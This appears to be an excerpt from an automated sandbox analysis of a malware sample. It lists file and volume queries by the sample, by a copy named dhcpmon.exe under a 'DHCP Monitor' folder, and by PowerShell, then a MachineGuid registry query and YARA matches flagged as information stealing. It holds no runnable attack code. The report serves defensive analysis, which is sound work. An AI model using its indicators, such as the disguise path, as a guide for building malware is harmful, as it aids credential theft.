        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Users\user\Desktop\U7Ncg7oAyC.exe VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43a9e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aab041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f3b041.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.44104b0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.dhcpmon.exe.3f307ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.52c0000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.U7Ncg7oAyC.exe.43d9e90.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.U7Ncg7oAyC.exe.3aa560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.U7Ncg7oAyC.exe.43307ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.dhcpmon.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.4dd04b0.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000000.298686733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.386853119.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000000.389457782.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000027.00000002.453407372.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.301869693.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000000.379537717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
